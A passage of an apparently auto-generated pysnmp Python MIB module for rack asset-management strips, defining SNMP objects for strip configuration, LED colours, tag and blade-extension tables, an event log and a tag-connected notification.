namedValues = NamedValues(("defaultLEDColorConnected", 0), ("defaultLEDColorDisconnected", 1), ("rackUnitCount", 2), ("assetStripName", 3), ("assetStripRackUnitNumberingMode", 4), ("assetStripRackUnitNumberingOffset", 5), ("assetStripOrientation", 6))
class AssetStripTypeEnumeration(TextualConvention, Integer32):
description = 'The asset strip types.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1))
namedValues = NamedValues(("simple", 0), ("composite", 1))
class LogEventTypeEnumeration(TextualConvention, Integer32):
description = 'The type of a log event.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3))
namedValues = NamedValues(("empty", 0), ("assetTagConnected", 1), ("assetTagDisconnected", 2), ("assetStripStateChange", 3))
assetStripCount = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: assetStripCount.setStatus('current')
if mibBuilder.loadTexts: assetStripCount.setDescription('The number of asset management strip units supported.')
defaultLEDColorConnected = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 1, 2), RGBCOLOR()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: defaultLEDColorConnected.setStatus('deprecated')
if mibBuilder.loadTexts: defaultLEDColorConnected.setDescription('Default color of all LEDs (RGB) when a tag is connected during automatic operation; in binary format. This is deprecated in favor of assetStripDefaultLEDColorConnected For SET operations, the value will be applied to all asset strips For GET operations, the value returned will be the value corresponding to asset strip 1')
defaultLEDColorConnectedStr = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 1, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: defaultLEDColorConnectedStr.setStatus('deprecated')
if mibBuilder.loadTexts: defaultLEDColorConnectedStr.setDescription('Default color of all LEDs (RGB) when a tag is connected during automatic operation; string with 3 hex octets This is deprecated in favor of assetStripDefaultLEDColorConnectedStr For SET operations, the value will be applied to all asset strips For GET operations, the value returned will be the value corresponding to asset strip 1')
defaultLEDColorDisconnected = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 1, 4), RGBCOLOR()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: defaultLEDColorDisconnected.setStatus('deprecated')
if mibBuilder.loadTexts: defaultLEDColorDisconnected.setDescription('Default color of all LEDs (RGB) when no tag is connected during automatic operation; in binary format. This is deprecated in favor of assetStripDefaultLEDColorDisConnected For SET operations, the value will be applied to all asset strips For GET operations, the value returned will be the value corresponding to asset strip 1')
defaultLEDColorDisconnectedStr = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 1, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: defaultLEDColorDisconnectedStr.setStatus('deprecated')
if mibBuilder.loadTexts: defaultLEDColorDisconnectedStr.setDescription('Default color of all LEDs (RGB) when no tag is connected during automatic operation; string with 3 hex octets This is deprecated in favor of assetStripDefaultLEDColorDisconnectedStr For SET operations, the value will be applied to all asset strips For GET operations, the value returned will be the value corresponding to asset strip 1')
assetStripConfigurationTable = MibTable((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1), )
if mibBuilder.loadTexts: assetStripConfigurationTable.setStatus('current')
if mibBuilder.loadTexts: assetStripConfigurationTable.setDescription('A list of configuration entries. The number of entries is given by the value of assetStripCount.')
assetStripConfigurationEntry = MibTableRow((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1), ).setIndexNames((0, "ASSETMANAGEMENT-MIB", "assetStripID"))
if mibBuilder.loadTexts: assetStripConfigurationEntry.setStatus('current')
if mibBuilder.loadTexts: assetStripConfigurationEntry.setDescription('An entry containing configuration objects for a particular asset management strip unit.')
assetStripID = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 256)))
if mibBuilder.loadTexts: assetStripID.setStatus('current')
if mibBuilder.loadTexts: assetStripID.setDescription('A unique value for each asset strip. Its value ranges between 1 and the value of assetStripCount.')
rackUnitCount = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(8, 64))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: rackUnitCount.setStatus('current')
if mibBuilder.loadTexts: rackUnitCount.setDescription('The number of rack-units for the asset management.')
assetStripState = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 3), AssetStripStateEnumeration()).setMaxAccess("readonly")
if mibBuilder.loadTexts: assetStripState.setStatus('current')
if mibBuilder.loadTexts: assetStripState.setDescription('Asset management strip state.')
assetStripName = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 4), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: assetStripName.setStatus('current')
if mibBuilder.loadTexts: assetStripName.setDescription('Asset management strip name.')
rackUnitNumberingMode = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 5), RackUnitNumberingModeEnumeration()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: rackUnitNumberingMode.setStatus('current')
if mibBuilder.loadTexts: rackUnitNumberingMode.setDescription('The rack unit nmbering mode for this asset strip.')
rackUnitNumberingOffset = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 6), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: rackUnitNumberingOffset.setStatus('current')
if mibBuilder.loadTexts: rackUnitNumberingOffset.setDescription('The offset (starting value) for rack Unit Numbering; This takes care of the case in which the asset strip is monitoring not all the assets but a subset of it, starting from racknumberingOffset. For example, the asset strip may be monitoring assets from 10 through 26; default value is 1 ')
assetStripOrientation = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 7), AssetStripOrientationEnumeration()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: assetStripOrientation.setStatus('current')
if mibBuilder.loadTexts: assetStripOrientation.setDescription('Is the asset strip oriented such that the connector is at the top or the bottom? If the asset strip has a tilt sensor, then this varaible is read-only and an to set(write) it will result in an error. If the asset strip does not have a tilt sensor, then this variable is read-write ')
currentMainTagCount = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: currentMainTagCount.setStatus('current')
if mibBuilder.loadTexts: currentMainTagCount.setDescription('Number of tags currently connected to the main strip.')
currentBladeTagCount = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: currentBladeTagCount.setStatus('current')
if mibBuilder.loadTexts: currentBladeTagCount.setDescription('Number of tags currently connected to blade extensions. This may be larger than the maxBladeTagCount. In this case an overflow occured and all tags over maxBladeTagCount are not recognized.')
maxMainTagCount = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 10), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: maxMainTagCount.setStatus('current')
if mibBuilder.loadTexts: maxMainTagCount.setDescription('Maximum number of tags on the main asset strip.')
maxBladeTagCount = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: maxBladeTagCount.setStatus('current')
if mibBuilder.loadTexts: maxBladeTagCount.setDescription('Maximum number of blade tags supported.')
bladeExtensionOverflow = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 12), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bladeExtensionOverflow.setStatus('current')
if mibBuilder.loadTexts: bladeExtensionOverflow.setDescription("Set if the maximum number of supported tags on blade extensions is reached. When this flag is set, new tags on blade extensions won't be discovered anymore until other tags on blade extensions are removed.")
assetStripType = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 13), AssetStripTypeEnumeration()).setMaxAccess("readonly")
if mibBuilder.loadTexts: assetStripType.setStatus('current')
if mibBuilder.loadTexts: assetStripType.setDescription('The asset strip type.')
numberOfComponentAssetStrips = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 14), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: numberOfComponentAssetStrips.setStatus('current')
if mibBuilder.loadTexts: numberOfComponentAssetStrips.setDescription('The number of components building a composite asset strip.')
assetStripDefaultLEDColorConnected = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 15), RGBCOLOR()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: assetStripDefaultLEDColorConnected.setStatus('current')
if mibBuilder.loadTexts: assetStripDefaultLEDColorConnected.setDescription('Default color of all LEDs (RGB) when a tag is connected during automatic operation; in binary format.')
assetStripDefaultLEDColorConnectedStr = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 16), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: assetStripDefaultLEDColorConnectedStr.setStatus('current')
if mibBuilder.loadTexts: assetStripDefaultLEDColorConnectedStr.setDescription('Default color of all LEDs (RGB) when a tag is connected during automatic operation; string with 3 hex octets')
assetStripDefaultLEDColorDisconnected = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 17), RGBCOLOR()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: assetStripDefaultLEDColorDisconnected.setStatus('current')
if mibBuilder.loadTexts: assetStripDefaultLEDColorDisconnected.setDescription('Default color of all LEDs (RGB) when no tag is connected during automatic operation; in binary format.')
assetStripDefaultLEDColorDisconnectedStr = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 18), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: assetStripDefaultLEDColorDisconnectedStr.setStatus('current')
if mibBuilder.loadTexts: assetStripDefaultLEDColorDisconnectedStr.setDescription('Default color of all LEDs (RGB) when no tag is connected during automatic operation; string with 3 hex octets')
assetManagementTable = MibTable((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1), )
if mibBuilder.loadTexts: assetManagementTable.setStatus('current')
if mibBuilder.loadTexts: assetManagementTable.setDescription('A list of asset management extries containing tag information and LED state. The number of entries is given by the value of rackUnitCount.')
assetManagementEntry = MibTableRow((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1), ).setIndexNames((0, "ASSETMANAGEMENT-MIB", "assetStripID"), (0, "ASSETMANAGEMENT-MIB", "rackUnitID"))
if mibBuilder.loadTexts: assetManagementEntry.setStatus('current')
if mibBuilder.loadTexts: assetManagementEntry.setDescription('An entry containing tag information and LED state for a rack unit.')
rackUnitID = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 256)))
if mibBuilder.loadTexts: rackUnitID.setStatus('current')
if mibBuilder.loadTexts: rackUnitID.setDescription('A unique value for each rack unit. Its value ranges between 1 and the value of rackUnitCount.')
ledOperationMode = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1, 2), AssetManagementLEDOperationModeEnumeration()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: ledOperationMode.setStatus('current')
if mibBuilder.loadTexts: ledOperationMode.setDescription('Operation mode of the LED (manual or automatic, based on tag connection).')
ledMode = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1, 3), AssetManagementLEDModeEnumeration()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: ledMode.setStatus('current')
if mibBuilder.loadTexts: ledMode.setDescription('Mode of the LED (on, off, fastBlink,slowBlink). Setting this value automatically switches the ledOperationMode to manual.')
ledColor = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1, 4), RGBCOLOR()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: ledColor.setStatus('current')
if mibBuilder.loadTexts: ledColor.setDescription('Color of the LED (RGB) in binary format. Setting this value automatically switches the ledOperationMode to manual.')
ledColorStr = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: ledColorStr.setStatus('current')
if mibBuilder.loadTexts: ledColorStr.setDescription('Color of the LED (RGB) in string format. It contains 3 hex octets for the RGB colors. Setting this value automatically switches the ledOperationMode to manual.')
tagID = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1, 6), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: tagID.setStatus('current')
if mibBuilder.loadTexts: tagID.setDescription('Asset management tag attached to the rack unit. Empty in case there is no tag attached.')
tagFamily = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1, 7), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: tagFamily.setStatus('current')
if mibBuilder.loadTexts: tagFamily.setDescription('Family of the asset management tag attached to the rack unit. Empty in case there is no tag attached.')
rackUnitPosition = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 256))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rackUnitPosition.setStatus('current')
if mibBuilder.loadTexts: rackUnitPosition.setDescription('A number associated with each rack unit. Its value depends on the rack unit numbering mode. It ranges between 1 and the value of rackUnitCount. If the asset strip is disconnected, then the value is 0.')
rackUnitType = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1, 9), RackUnitTypeEnumeration()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rackUnitType.setStatus('current')
if mibBuilder.loadTexts: rackUnitType.setDescription('Type of the connected tag (single server or blade extension). If the asset strip is disconnected, then the value is unknown. If the asset tag is disconnected, then the value is none.')
bladeExtensionSize = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bladeExtensionSize.setStatus('current')
if mibBuilder.loadTexts: bladeExtensionSize.setDescription('In case a blade extension is connected this returns the number of slots on the extension. If the asset strip is disconnected or no blade is connected, then the value is 0.')
rackUnitName = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1, 12), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: rackUnitName.setStatus('current')
if mibBuilder.loadTexts: rackUnitName.setDescription('Name for a specific rackunit, may be feeely chosen.')
assetStripCascadePosition = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 99))).setMaxAccess("readonly")
if mibBuilder.loadTexts: assetStripCascadePosition.setStatus('current')
if mibBuilder.loadTexts: assetStripCascadePosition.setDescription('This is the position of the asset Strip in a cascaded chain. Numbered in ascending order starting with the asset strip connected to the device (EMX/PX). For non-cascaded asset strips, value = 1')
rackUnitRelativePosition = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1, 14), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 99))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rackUnitRelativePosition.setStatus('current')
if mibBuilder.loadTexts: rackUnitRelativePosition.setDescription('This is the relative position of the rackUnit within the assetStrip. For cascaded asset strips such as the AMS-M2-Z and AMS-M3-Z, it is numbered in ascending order starting with the rackunit closest to the asset strip edge with the connector. For non-cascaded asset strips, value = 1')
assetStripNumberOfRackUnits = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1, 15), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 256))).setMaxAccess("readonly")
if mibBuilder.loadTexts: assetStripNumberOfRackUnits.setStatus('current')
if mibBuilder.loadTexts: assetStripNumberOfRackUnits.setDescription(' For non-cascaded asset strips, value = rackUnitCount For cascaded asset strips, it is the number of rack units in the asset Strip. Examples: 2 forAMS-M2-Z, 3 for AMS-M3-Z. ')
bladeExtensionTable = MibTable((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 2), )
if mibBuilder.loadTexts: bladeExtensionTable.setStatus('current')
if mibBuilder.loadTexts: bladeExtensionTable.setDescription('A list of blade server extension entries containing tag information.')
bladeExtensionEntry = MibTableRow((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 2, 1), ).setIndexNames((0, "ASSETMANAGEMENT-MIB", "assetStripID"), (0, "ASSETMANAGEMENT-MIB", "rackUnitID"), (0, "ASSETMANAGEMENT-MIB", "bladeSlotID"))
if mibBuilder.loadTexts: bladeExtensionEntry.setStatus('current')
if mibBuilder.loadTexts: bladeExtensionEntry.setDescription('An entry containing tag information for a blade server extension.')
bladeSlotID = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 16)))
if mibBuilder.loadTexts: bladeSlotID.setStatus('current')
if mibBuilder.loadTexts: bladeSlotID.setDescription('A unique value for each slot on a blade extension.')
bladeTagID = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 2, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bladeTagID.setStatus('current')
if mibBuilder.loadTexts: bladeTagID.setDescription('Asset management tag attached to a blade extension at the rack unit. Empty in case there is no tag attached.')
bladeSlotPosition = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 256))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bladeSlotPosition.setStatus('current')
if mibBuilder.loadTexts: bladeSlotPosition.setDescription('A number associated with each blade slot. It ranges between 1 and the value of bladeExtensionSize.')
logConfiguration = MibIdentifier((1, 3, 6, 1, 4, 1, 13742, 7, 3, 1))
logSize = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 3, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: logSize.setStatus('current')
if mibBuilder.loadTexts: logSize.setDescription('The number of entries in the asset management log table.')
oldestLogID = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 3, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: oldestLogID.setStatus('current')
if mibBuilder.loadTexts: oldestLogID.setDescription('The index of the oldest entry in the log table.')
newestLogID = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 3, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: newestLogID.setStatus('current')
if mibBuilder.loadTexts: newestLogID.setDescription('The index of the newest entry in the log table.')
logEventCount = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 3, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: logEventCount.setStatus('current')
if mibBuilder.loadTexts: logEventCount.setDescription('The total number of logged events.')
assetManagementLogTable = MibTable((1, 3, 6, 1, 4, 1, 13742, 7, 3, 2), )
if mibBuilder.loadTexts: assetManagementLogTable.setStatus('current')
if mibBuilder.loadTexts: assetManagementLogTable.setDescription('A ring buffer containing asset management events.')
assetManagementLogEntry = MibTableRow((1, 3, 6, 1, 4, 1, 13742, 7, 3, 2, 1), ).setIndexNames((0, "ASSETMANAGEMENT-MIB", "logIndex"))
if mibBuilder.loadTexts: assetManagementLogEntry.setStatus('current')
if mibBuilder.loadTexts: assetManagementLogEntry.setDescription('An entry in the asset management log table.')
logIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 3, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 5000)))
if mibBuilder.loadTexts: logIndex.setStatus('current')
if mibBuilder.loadTexts: logIndex.setDescription('The index of an entry in the log ring buffer. Its value ranges between 1 and logSize.')
logTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 3, 2, 1, 2), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: logTimeStamp.setStatus('current')
if mibBuilder.loadTexts: logTimeStamp.setDescription('The time of the log entry in seconds relative to January 1, 1970 00:00 UTC.')
logEventType = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 3, 2, 1, 3), LogEventTypeEnumeration()).setMaxAccess("readonly")
if mibBuilder.loadTexts: logEventType.setStatus('current')
if mibBuilder.loadTexts: logEventType.setDescription('The type of this log entry.')
logAssetStripNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 3, 2, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 256))).setMaxAccess("readonly")
if mibBuilder.loadTexts: logAssetStripNumber.setStatus('current')
if mibBuilder.loadTexts: logAssetStripNumber.setDescription('A unique value for each asset strip. Its value ranges between 1 and the value of assetStripCount.')
logRackUnitNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 3, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 256))).setMaxAccess("readonly")
if mibBuilder.loadTexts: logRackUnitNumber.setStatus('current')
if mibBuilder.loadTexts: logRackUnitNumber.setDescription('A unique value for each rack unit. Its value ranges between 1 and the value of rackUnitCount. It corresponds with rackUnitID, the fixed ordinal index of each rack unit.')
logRackUnitPosition = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 3, 2, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 256))).setMaxAccess("readonly")
if mibBuilder.loadTexts: logRackUnitPosition.setStatus('current')
if mibBuilder.loadTexts: logRackUnitPosition.setDescription('A number associated with each rack unit. Its value depends on the rack unit numbering mode. It ranges between 1 and the value of rackUnitCount. If the asset strip is disconnected, then the value is 0.')
logSlotNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 3, 2, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: logSlotNumber.setStatus('current')
if mibBuilder.loadTexts: logSlotNumber.setDescription('A unique value for each slot on a blade extension. Value of 0 indicates a tag on the main strip. If the asset strip is disconnected, the value is 0 as well. Use logEventType to distinguish the validity.')
logTagID = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 3, 2, 1, 8), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: logTagID.setStatus('current')
if mibBuilder.loadTexts: logTagID.setDescription('Asset management tag attached to the rack unit. Empty in case there is no tag attached.')
logAssetStripState = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 3, 2, 1, 9), AssetStripStateEnumeration()).setMaxAccess("readonly")
if mibBuilder.loadTexts: logAssetStripState.setStatus('current')
if mibBuilder.loadTexts: logAssetStripState.setDescription('Asset management strip state.')
logParentBladeID = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 3, 2, 1, 10), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: logParentBladeID.setStatus('current')
if mibBuilder.loadTexts: logParentBladeID.setDescription('In case the tag is attached to a blade extension, this indicates the tagID of the extension. Empty in case there is no tag attached or the tag is attached on the main strip.')
deviceName = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 0, 0, 1), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: deviceName.setStatus('current')
if mibBuilder.loadTexts: deviceName.setDescription('The user-defined name for the Device.')
deviceInetAddressType = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 0, 0, 2), InetAddressType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: deviceInetAddressType.setStatus('current')
if mibBuilder.loadTexts: deviceInetAddressType.setDescription('The type of address format')
deviceInetIPAddress = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 0, 0, 3), InetAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: deviceInetIPAddress.setStatus('current')
if mibBuilder.loadTexts: deviceInetIPAddress.setDescription('The current IP address. A value of 0.0.0.0 indicates an error or an unset option.')
assetStripNumber = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 0, 0, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 256))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: assetStripNumber.setStatus('current')
if mibBuilder.loadTexts: assetStripNumber.setDescription('A unique value for each asset strip. Its value ranges between 1 and the value of assetStripCount.')
rackUnitNumber = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 0, 0, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 256))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: rackUnitNumber.setStatus('current')
if mibBuilder.loadTexts: rackUnitNumber.setDescription('A unique value for each rack unit. Its value ranges between 1 and the value of rackUnitCount. It corresponds with rackUnitID, the fixed ordinal index of each rack unit.')
assetStripFirmwareUpdateState = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 0, 0, 6), AssetStripFirmwareUpdateStateEnumeration()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: assetStripFirmwareUpdateState.setStatus('current')
if mibBuilder.loadTexts: assetStripFirmwareUpdateState.setDescription('The new asset strip firmware update state.')
deviceUserName = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 0, 0, 7), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: deviceUserName.setStatus('current')
if mibBuilder.loadTexts: deviceUserName.setDescription('The user currently logged in.')
deviceChangedParameter = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 0, 0, 8), DeviceConfigurationParameterEnumeration()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: deviceChangedParameter.setStatus('current')
if mibBuilder.loadTexts: deviceChangedParameter.setDescription('Description of the parameter(s) that changed. ')
changedParameterNewValue = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 0, 0, 9), DisplayString()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: changedParameterNewValue.setStatus('current')
if mibBuilder.loadTexts: changedParameterNewValue.setDescription('The new value of the changed parameter.')
slotNumber = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 0, 0, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: slotNumber.setStatus('current')
if mibBuilder.loadTexts: slotNumber.setDescription('A unique value for each slot on a blade extension. Value of 0 indicates a tag on the main strip.')
oldNumberOfComponentAssetStrips = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 0, 0, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: oldNumberOfComponentAssetStrips.setStatus('current')
if mibBuilder.loadTexts: oldNumberOfComponentAssetStrips.setDescription('The old number of components building a composite asset strip.')
agentInetPortNumber = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 0, 0, 12), InetPortNumber()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: agentInetPortNumber.setStatus('current')
if mibBuilder.loadTexts: agentInetPortNumber.setDescription('The UDP port number used for accessing the SNMP agent on the device. Examples: If the associated device MIB (PX2-MIB, EMD-MIB) has deviceCascadeType set to portForwarding, then master: 50500 slave 1:50501 slave 2: 50502 ...... If cascading mode is not portForwarding and default (Standard) ports are being used, then port: 161 ')
assetTagConnected = NotificationType((1, 3, 6, 1, 4, 1, 13742, 7, 0, 1)).setObjects(("ASSETMANAGEMENT-MIB", "deviceName"), ("SNMPv2-MIB", "sysContact"), ("SNMPv2-MIB", "sysName"), ("SNMPv2-MIB", "sysLocation"), ("ASSETMANAGEMENT-MIB", "deviceInetAddressType"), ("ASSETMANAGEMENT-MIB", "deviceInetIPAddress"), ("ASSETMANAGEMENT-MIB", "agentInetPortNumber"), ("ASSETMANAGEMENT-MIB", "assetStripNumber"), ("ASSETMANAGEMENT-MIB", "assetStripName"), ("ASSETMANAGEMENT-MIB", "rackUnitNumber"), ("ASSETMANAGEMENT-MIB", "rackUnitPosition"), ("ASSETMANAGEMENT-MIB", "rackUnitName"), ("ASSETMANAGEMENT-MIB", "slotNumber"), ("ASSETMANAGEMENT-MIB", "tagID"), ("ASSETMANAGEMENT-MIB", "bladeTagID"), ("ASSETMANAGEMENT-MIB", "ledColor"), ("ASSETMANAGEMENT-MIB", "ledMode"), ("ASSETMANAGEMENT-MIB", "ledOperationMode"), ("ASSETMANAGEMENT-MIB", "rackUnitCount"), ("ASSETMANAGEMENT-MIB", "assetStripType"), ("ASSETMANAGEMENT-MIB", "assetStripCascadePosition"), ("ASSETMANAGEMENT-MIB", "rackUnitRelativePosition"), ("ASSETMANAGEMENT-MIB", "assetStripNumberOfRackUnits"))
if mibBuilder.loadTexts: assetTagConnected.setStatus('current')
if mibBuilder.loadTexts: assetTagConnected.setDescription('The asset tag of a rack unit was connected. bladeTagID is empty if the asset tag is not on a blade extension.')
